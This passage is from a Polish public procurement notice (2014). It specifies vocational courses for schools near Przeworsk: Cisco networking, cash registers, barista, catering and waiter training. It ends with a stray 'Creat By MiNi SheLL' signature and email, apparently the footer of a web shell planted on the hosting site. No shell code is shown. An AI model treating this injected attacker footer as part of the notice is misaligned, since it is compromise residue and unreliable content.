8.	Niezgodności spawalnicze, kontrola i badania złączy spawanych
9.	Konstrukcje spawne i jakość w spawalnictwie
10.	Szkolenie, egzaminowanie, kwalifikowanie, certyfikowanie i uprawnienia spawaczy
11.	Przepisy, wytyczne i normy dotyczące spawalnictwa
12.	BHP i PPOŻ. Przy pracach spawalniczych
13.	Instruktaż wstępny i ćwiczenia
7. Wykonawca zapewni:
- materiały do ćwiczeń praktycznych w metodzie TIG
- odzież ochronną (fartuchy spawalnicze, okulary, czapki, rękawice)
- badania lekarskie 
- materiały biurowe (skrypty)
- ubezpieczenie od następstw nieszczęśliwych wypadków uczestników kursu. 
- egzamin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Szkolenie z technologii  CISCO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Miejsce przeprowadzenia szkolenia : Szkolenie będzie prowadzone w placówce Zamawiającego tj.:
w salach dydaktycznych Zespołu Szkół Zawodowych w Przeworsku, 
ul. Krasickiego 9, 37-200 Przeworsk, po godzinach zajęć dydaktycznych. 
2. Liczba osób biorących udział w szkoleniu:  20 osób - 2 grupy 
3. Liczba godzin:  40 godzin  
 Liczba godzin zajęć dziennie (w dniach od poniedziałku do piątku) na osobę nie może być większa niż 4 godziny lekcyjne, a w dni wolne od nauki szkolnej nie może być większa niż 8 godzin lekcyjnych. Długość przerw będzie ustalana w sposób elastyczny przez wykonawcę.
4. Termin przeprowadzenia szkolenia: szkolenie należy przeprowadzić w okresie: 
maj - październik 2014r.  20 osób (2 grupy po 10 osób)
5. Program kursu Sieci dla domu i małych przedsiębiorstw (Networking for Home and Small Businesses)
1. Sprzęt komputera osobistego
2. Systemy operacyjne
3. Łączenie z siecią
4. Podłączanie do Internetu przez ISP
5. Adresacja sieciowa
6. Usługi sieciowe
7. Technologie bezprzewodowe
8. Podstawy bezpieczeństwa
9. Usuwanie problemów w sieci
10. Final Exam.
6. Szkolenie powinno być prowadzone przez certyfikowanego wykładowcę CISCO. Dokument potwierdzający fakt posiadania certyfikatu, Wykonawca zobowiązuje się złożyć przed podpisaniem umowy na daną część zamówienia. Po zakończeniu szkolenia uczestnicy otrzymują zaświadczenie o ukończeniu szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs obsługi kas fiskalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 - realizacja kursu dla Zespołu Szkół Rolniczych im. Wincentego Witosa 
w Zarzeczu
Zadanie 2 - realizacja kursu dla  Zespołu Szkół w Kańczudze 
1.	Miejsce przeprowadzenie kursu: Kurs będzie prowadzony w placówce Zamawiającego tj.:
Zadanie 1 - w salach dydaktycznych Zespołu Szkół Rolniczych im. Wincentego Witosa 
w Zarzeczu, 37-205 Zarzecze 1 w dniach wolnych od nauki szkolnej. 
Zadanie 2 - w salach dydaktycznych Zespołu Szkół w Kańczudze, ul. Marii Konopnickiej 6, 37-220 Kańczuga, w dniach wolnych od nauki szkolnej.
2.	Liczba osób biorących udział w kursie:  
Zadanie 1 - 36 osób (4 grupy - po 9 osób) 
Zadanie 2 - 16 osób (2 grupy po 8 osób)
3. Liczba godzin:  15 godzin  (50% zajęć teoretycznych i 50% praktycznych) 
Liczba godzin zajęć dziennie (w dniach od poniedziałku do piątku) na osobę nie może być większa niż 4 godziny lekcyjne, a w dni wolne od nauki szkolnej nie może być większa niż 8 godzin lekcyjnych. Długość przerw będzie ustalana w sposób elastyczny przez wykonawcę.
4. Terminy przeprowadzenia kursu: kurs należy przeprowadzić w okresach:  
Zadanie 1  kwiecień -maj  2014r. - 36 osób (4 grupy po 9 osób)
Zadanie 2 - kwiecień  - maj 2014r. - 16 osób (2 grupy)  
5. Tematyka kursu; Zajęcia teoretyczne i zajęcia praktyczne obejmujące naukę umiejętności potrzebnych na stanowisku kasjer, zawierające, co najmniej następujące zagadnienia: 
budowa i obsługa kasy fiskalnej, 
wystawiania faktur i rachunków, 
sprzedaż towarów na kasie, 
drukowanie raportów kasowych, 
zasady przechowywania i magazynowania towarów, 
zasady BHP w obiekcie handlowym.
6.  Cel  zadania
Celem realizacji zadania jest nabycie przez uczestników kursu umiejętności obsługi kasy fiskalnej oraz zwiększenie motywacji do dalszego doskonalenia wiedzy i umiejętności w tym zakresie.
7. Wykonawca zobowiązany jest do: 
przeprowadzenia kursu zgodnie z ustalonym opisem nauczania, liczbą godzin kursu i harmonogramem.
zapewnienia uczestnikom od pierwszego dnia zajęć niezbędnych materiałów szkoleniowych - na własność. 
Wydania zaświadczeń potwierdzających ukończenie kursu dla uczestników.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs baristyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 - realizacja kursu dla  Zespołu Szkół Rolniczych w Zarzeczu
Zadanie 2 - realizacja kursu dla Zespołu Szkół w Kańczudze
Miejsce przeprowadzenie kursu: Kursy będą prowadzone w dwóch placówkach Zamawiającego:
w salach dydaktycznych Zespołu Szkół Rolniczych w Zarzeczu ul. im. Wincentego Witosa, 37-205 Zarzecze 1, w dniach wolnych od nauki szkolnej lub/i po zajęciach dydaktycznych
w salach dydaktycznych Zespołu Szkół w Kańczudze, ul. Konopnickiej 6, 37 - 220 Kańczuga, w dniach wolnych od nauki szkolnej lub/i po zajęciach dydaktycznych
2. Liczba osób biorących udział w kursie:  
Zadanie 1 - realizacja kursu dla  Zespołu Szkół Rolniczych w Zarzeczu:  15 osób (1 grupa)
Zadanie 2 - realizacja kursu dla Zespołu Szkół w Kańczudze 10 osób (1 grupa) 
3. Liczba godzin: 16 godzin zegarowych (50 % zajęcia dydaktyczne, 50 % zajęcia praktyczne) Liczba godzin zajęć dziennie (w dniach od poniedziałku do piątku) na osobę nie może być większa niż 4 godziny lekcyjne, a w dni wolne od nauki szkolnej nie może być większa niż 8 godzin lekcyjnych. Długość przerw będzie ustalana w sposób elastyczny przez wykonawcę.
4. Terminy przeprowadzenia kursu: 
Zadanie 1 - realizacja kursu dla  Zespołu Szkół Rolniczych w Zarzeczu: kurs należy przeprowadzić w 2014r.
Zadanie 2 - realizacja kursu dla Zespołu Szkół w Kańczudze kurs należy przeprowadzić w 2014r.
5. Zakres tematyczny wspólny dla Zadania 1 i Zadania 2: 
   Część 1 
 Historia kawy
 Arabika i robusta
 Uprawa
 Sposoby zbioru owoców kawowca
 Uzysk ziarna z owoców kawowca
 Prażenie ziarna kawowca
 Dobór ziaren do poszczególnych mieszanek
 Pakowanie kawy
 Sposoby przechowywania kawy
  Część 2 
 Parametry Espresso
 Zasada 4 M
 Kawy na bazie espresso
 Mleko i jego pożądane właściwości w przygotowaniu kaw na bazie mleka
 Domowe sposoby przygotowania kawy 
 Kawy gorące i kawy mrożone
 Część 3
 CWICZENIA PRAKTYCZNE - praca przy ekspresach.
 Prawidłowy sposób przygotowania espresso 
 Dziesięć najważniejszych czynności - efekt  PERFECTO ESPRESSO
 Spienianie mleka - kawy na bazie mleka spienionego gorącego.
 Trening czyni Mistrza czyli ćwiczenia praktyczne
Część 4 
 Egzamin teoretyczny i egzamin praktyczny.
 Wydanie certyfikatów poświadczających ukończenie kursu
6. Wykonawca zobowiązany jest do: 
a)	przeprowadzenia kursu zgodnie z ustalonym opisem nauczania i liczbą godzin zapewnienia uczestnikom od pierwszego dnia zajęć niezbędnych materiałów szkoleniowych - na własność. 
b)	zapewnia podczas zajęć praktycznych niezbędnych materiałów, urządzeń, narzędzi do przeprowadzenia kursu spełniające wymogi BHP w ilości i stanie technicznym zapewniającym odpowiedni poziom szkolenia (tj. jeden profesjonalny ekspres ciśnieniowy dwugrupowy na 5 osób w grupie, cztery dzbanki do ubijania mleka na jeden ekspres, dwa młynki, blender barmański, dwa shakery,  dwa tampery na jeden ekspres, dwa odbijaki na 1 ekspres, kruszarka do lodu, narzędzia do latte Art.) oraz swobodny dostęp do stanowiska, przy którym będzie odbywała się praktyka 
c)	wystawienie certyfikatów ukończenia kursu baristycznego dla uczestników szkolenia po jego ukończeniu. 
Inne materiały niezbędne do przeprowadzenia kursu
Kawa ziarnista dobrej jakości (wg zapotrzebowania min. 0,5 kg na osobę)
Syropy smakowe do kawy (wg zapotrzebowania)
Cukier (wg zapotrzebowania)
Mleko (wg zapotrzebowania ok. 10l na osobę)
Gęsta czekolada do malowania wzorów na kawie (wg zapotrzebowania)
Cukier trzcinowy (wg zapotrzebowania)
Filiżanki do espresso (min. 24 szt.)
Filiżanki do cappuccino (min. 20 szt.)
Szklanki do latte (min. 18 szt.)
Szklaneczki do wody
Shoots do espresso
Szkło żaroodporne do Irish Caffe
Dzbanek do kawy wyciskanej
Mokka
Dzbanuszek do kawy po turecku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs organizator przyjęć okolicznościowych- catering.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Miejsce przeprowadzenie kursu: Kurs będzie prowadzony w placówce Zamawiającego tj.:
w salach dydaktycznych Zespołu Szkół Rolniczych w Zarzeczu , 37-205 Zarzecze 1,  w dniach wolnych od nauki szkolnej  i/ lub po zajęciach dydaktycznych
2. Liczba osób biorących udział w kursie:  16 osób - 1 grupa  
3. Liczba godzin: 75 godzin  (40 % zajęć teoretycznych i 60 % praktycznych) 
Liczba godzin zajęć dziennie (w dniach od poniedziałku do piątku) na osobę nie może być większa niż 4 godziny lekcyjne, a w dni wolne od nauki szkolnej nie może być większa niż 8 godzin lekcyjnych. Długość przerw będzie ustalana w sposób elastyczny przez wykonawcę.
4. Termin przeprowadzenia kursu: kurs należy przeprowadzić w 2014r.
5. Tematyka kursu: 
Zajęcia teoretyczne i zajęcia praktyczne obejmujące naukę umiejętności potrzebne na stanowisku organizatora przyjęć okolicznościowych zawierające, co najmniej następujące zagadnienia:
- wystrój  oprawa florystyczna  miejsca imprezy, 
- zasady GHP/GMP oraz system HACCP, 
- organizacja punktu gastronomicznego oraz usług gastronomicznych i cateringowych, 
- technologia produkcji kulinarnej, 
- zasady marketingu usług, 
- profesjonalna obsługa klienta, 
- serwowanie potraw,
6. Celem realizacji zadania jest nabycie przez uczestników kursu umiejętności organizacji przyjęć okolicznościowych - catering oraz zwiększenie motywacji do dalszego doskonalenia wiedzy i umiejętności w tym zakresie.
7. Wykonawca zobowiązany jest do: 
d)	przeprowadzenia kursu zgodnie z ustalonym opisem nauczania i liczbą godzin.
e)	zapewnienia uczestnikom od pierwszego dnia zajęć niezbędnych materiałów szkoleniowych - na własność. 
f)	Wydania zaświadczeń potwierdzających ukończenie kursu dla uczestników.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kurs kelnerski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 - realizacja kursu dla  Zespołu Szkół Rolniczych im. Wincentego Witosa 
w Zarzeczu
Zadanie 2 - realizacja kursu dla Zespołu Szkół w Kańczudze
1. Miejsce przeprowadzenie kursu: Kurs będzie prowadzony w placówce Zamawiającego tj.:
w salach dydaktycznych Zespołu Szkół Rolniczych w Zarzeczu ul. im. Wincentego Witosa, 37-205 Zarzecze 1 w dniach wolnych od nauki szkolnej i/lub po godzinach zajęć dydaktycznych
w salach dydaktycznych Zespołu Szkół w Kańczudze, ul. Konopnickiej 6, 37-220 Kańczuga, w dniach wolnych od nauki szkolnej i/lub po godzinach zajęć dydaktycznych
2. Liczba osób biorących udział w kursie: 
Zadanie 1 -  23 osób (2 grupy - po 11 i 12 osób) 
Zadanie 2 - 10 osób (1 grupa 10 osób)
3. Liczba godzin:  60 godzin  (40% zajęć teoretycznych i 60 % praktycznych) 
Liczba godzin zajęć dziennie (w dniach od poniedziałku do piątku) na osobę nie może być większa niż 4 godziny lekcyjne, a w dni wolne od nauki szkolnej nie może być większa niż 8 godzin lekcyjnych. Długość przerw będzie ustalana w sposób elastyczny przez wykonawcę.
4. Terminy przeprowadzenia kursu: 
Zadanie 1 - realizacja kursu dla  Zespołu Szkół Rolniczych w Zarzeczu: kurs należy przeprowadzić w 2014r.
Zadanie 2 - realizacja kursu dla Zespołu Szkół w Kańczudze : kurs należy przeprowadzić w 2014r.
5. Tematyka kursu - Zajęcia teoretyczne i zajęcia praktyczne obejmujące naukę umiejętności potrzebnych na stanowisku kelnera, zawierające, co najmniej następujące zagadnienia: 
5.1. Wygląd i prezencja kelnera
- cechy osobowe dobrego kelnera;
- kultura obsługi gości przy stole z elementami wiedzy psychologicznej;
- sprzedaż sugestywna;
- napiwki - nagroda za dobrze wykonaną pracę kelnera.
5.2. Karty menu
- znaczenie znajomości karty menu i karty win;
- podawanie kart menu;
- doradzanie przy wyborze potraw.
5.3. Przygotowanie sali konsumenckiej
- przygotowanie zastawy stołowej do podawania dań i napojów;
- przygotowanie pomocnika kelnerskiego.
5.4. Techniki nakrywania stołów bielizną stołową
- metoda składania obrusów;
- techniki rozkładania obrusów;
- technika zdejmowania obrusa;
- zmiana obrusa w obecności gości.
5.5. Dekoracja stołu
- zasady dekorowania stołu;
- elementy dekoracyjne;
- dekoracyjne składanie serwet płóciennych. 
5.6. Nakrywanie stołów
- nakrycie proste;
- nakrycie rozszerzone;
- przygotowanie nakrycia w obecności gości.
5.7. Przenoszenie tac i zastawy stołowej
-  przenoszenie talerzy;
- przenoszenie bulionówek;
- przenoszenie szkła i filiżanek;
- przenoszenie sztućców;
- przenoszenie półmisków.
5.8. Zbieranie zastawy stołowej po konsumpcji
- zbieranie talerzy po konsumpcji;
- zbieranie zastawy stołowej na tacę
5.9. Przebieg obsługi gości
- powitanie i zajmowanie miejsc przez gości;
- przyjmowanie zamówienia;
- serwowanie potraw i napojów;
- rozmowa z gośćmi;
- realizacja rachunku;
- pożegnanie gości.
5.10. Ogólne zasady obsługi
- kolejność podawania potraw i napojów;
- kolejność obsługi;
- skargi i reklamacje;
- postępowanie z trudnym gościem.
5.11. Metody obsługi
- serwis niemiecki;
- serwis rosyjski;
- elementy serwisu francuskiego;
- serwis bufetowy.
5.12. Podawanie napojów bezalkoholowych
- podawanie gorących napojów bezalkoholowych;
- podawanie zimnych napojów bezalkoholowych.
5.13. Podawanie napojów alkoholowych
- podawanie piwa;
- techniki podawania wina oraz dekantacja wina;
- podawanie wódek;
- dobór alkoholi do potraw.
5.14. Organizacja obsługi przyjęć okolicznościowych
- przygotowanie sali, nakrywanie i dekoracja stołów;
- techniki obsługi gości.
5.15. Konsultacje indywidualne - tworzenie profesjonalnego CV.
6.  Cel  zadania
Celem realizacji zadania jest nabycie przez uczestników kursu umiejętności kelnerskich oraz zwiększenie motywacji do dalszego doskonalenia wiedzy i umiejętności w tym zakresie.
7. Wykonawca zobowiązany jest do: 
g)	przeprowadzenia kursu zgodnie z ustalonym opisem nauczania, liczby godzin szkolenia i harmonogramem.
h)	zapewnienia uczestnikom od pierwszego dnia zajęć niezbędnych materiałów szkoleniowych - na własność. 
i)	Wydania zaświadczeń potwierdzających ukończenie kursu dla uczestników..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com